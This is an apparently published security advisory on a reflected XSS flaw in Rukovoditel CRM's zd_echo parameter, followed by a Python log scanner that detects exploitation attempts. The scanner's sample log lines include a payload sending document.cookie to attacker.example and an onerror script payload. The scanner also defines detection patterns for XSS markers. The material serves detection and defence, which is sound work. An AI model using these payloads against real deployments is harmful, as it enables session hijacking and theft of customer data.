Reflected XSS in Rukovoditel CRM enables session compromise
TL;DR — An unauthenticated reflected XSS in Rukovoditel CRM’s Zadarma endpoint can execute attacker-controlled JavaScript in a victim’s session when they open a crafted link.
What happened
Rukovoditel CRM is a web-based customer relationship management application. CVE-2026-31845 describes a reflected cross-site scripting (XSS) vulnerability in the Zadarma telephony API endpoint /_api/tel/zadarma.php: the application writes the value of the zd_echo GET parameter directly into the HTTP response without output encoding, so a browser that renders the response as HTML will execute any markup or script the parameter carries.
Per the CVE record, exploitation is unauthenticated and requires user interaction (a victim opening an attacker-crafted URL while logged in). The script then runs with the victim's session, enabling the usual reflected-XSS outcomes: session hijacking, credential theft, in-app phishing, or account takeover through actions the victim is authorized to perform.
| Item | Source value |
|---|---|
| Affected software | Rukovoditel CRM |
| Vulnerable endpoint | /api/tel/zadarma.php |
| Vulnerable parameter | zd_echo (GET) |
| Weakness | CWE-79 (Reflected XSS) |
| Severity | CVSS v3.1 9.3 (Critical) (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N) |
| Affected versions | 3.6.4 (and earlier, per description) |
| Unaffected version (source) | 3.7 |
XSS in business apps remains a high-leverage issue because these systems often sit on identity-bearing sessions (support/admin workflows) and hold sensitive customer data; a single click can be enough to pivot into broader compromise.
Who is impacted
- Deployments running Rukovoditel CRM version 3.6.4 (the CVE record states the issue exists in 3.6.4 and earlier).
- Instances that expose the Zadarma integration endpoint /_api/tel/zadarma.php to users who could be targeted with crafted links.
- Organizations where Rukovoditel sessions have access to high-value data (customer records, notes, attachments) or privileged administrative actions that can be triggered from an authenticated browser session.
What to do now
- Follow vendor remediation guidance and apply the fixed release referenced by the CVE record (the record lists 3.7 as unaffected).
- Inventory where Rukovoditel CRM is deployed and confirm running versions (VM images, containers, and deployed artifacts), focusing on internet- or partner-exposed instances.
- Until updates are applied, reduce exposure of the vulnerable route where feasible (e.g., restrict access to /api/tel/zadarma.php to trusted networks; note that this also blocks Zadarma's own callbacks unless their source addresses are allowed) and monitor for suspicious requests containing zd_echo= payloads. Because this is reflected XSS, the exploiting request is issued by the victim's browser, so it appears in access logs under the victim's client address, not the attacker's.
- If you suspect exploitation, treat this as potential session compromise: review authentication logs and rotate credentials/tokens that could be exposed via an authenticated browser session.
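The monitoring step above can be automated. The following is an added example written for this page, not code from the advisory, the CVE record, or the Rukovoditel project. It scans web-server access logs in the Apache/nginx "combined" format for requests to the Zadarma endpoint whose zd_echo value, after undoing repeated percent-encoding, contains HTML or script markers. The log lines are constructed for the example; the endpoint path regex accepts both the /_api/ and /api/ spellings because this page uses both, and the marker list is an assumption about what never belongs in a legitimate echo-check value.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (not real traffic). Lines 2 and 3 carry payloads;
# line 3 is double-encoded, a common trick against naive "contains <script" filters.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2026:12:00:01 +0000] "GET /_api/tel/zadarma.php?zd_echo=ping HTTP/1.1" 200 4 "-" "Zadarma/1.0"
203.0.113.11 - - [10/Mar/2026:12:00:02 +0000] "GET /_api/tel/zadarma.php?zd_echo=%3Cscript%3Edocument.location%3D%27https://attacker.example/%3F%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 87 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Mar/2026:12:00:03 +0000] "GET /api/tel/zadarma.php?zd_echo=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 31 "-" "Mozilla/5.0"
203.0.113.13 - - [10/Mar/2026:12:00:04 +0000] "GET /index.php?module=users/login&zd_echo=%3Cscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
this line is not in combined log format and is skipped
"""

# Endpoint as written on this page; both "/_api/" and "/api/" spellings are accepted (assumption).
ENDPOINT_RE = re.compile(r"^/_?api/tel/zadarma\.php$", re.IGNORECASE)

# Apache/nginx combined format: client - user [time] "METHOD target HTTP/x" status bytes "ref" "ua"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers that have no legitimate reason to appear in a telephony echo check (assumption).
XSS_MARKERS = [
    ("html_tag", re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)),
    ("javascript_url", re.compile(r"javascript\s*:", re.IGNORECASE)),
    ("script_api", re.compile(r"\b(alert|document\.cookie|eval)\b", re.IGNORECASE)),
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_payload(payload):
    """Return the names of the XSS markers present in a decoded zd_echo value."""
    return [name for name, pattern in XSS_MARKERS if pattern.search(payload)]


def scan_log(lines):
    """Return one finding per request that sends a suspicious zd_echo to the endpoint."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m.group("target"))
        if not ENDPOINT_RE.match(parts.path):
            continue  # zd_echo elsewhere is not this bug
        # parse_qs decodes one layer; fully_decode strips any further layers.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("zd_echo", []):
            payload = fully_decode(raw)
            markers = classify_payload(payload)
            if markers:
                findings.append({
                    "line": lineno,
                    # For reflected XSS this is the victim's address, not the attacker's.
                    "client": m.group("client"),
                    "status": int(m.group("status")),
                    "payload": payload,
                    "markers": markers,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']} client {f['client']} status {f['status']} "
              f"markers {','.join(f['markers'])}: {f['payload']}")
```

A 200 status on a flagged request tells you the server reflected the payload; whether a victim actually executed it depends on the User-Agent being a real browser session rather than a scanner, so pair findings with the authentication logs for the same client address and time window before rotating credentials.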
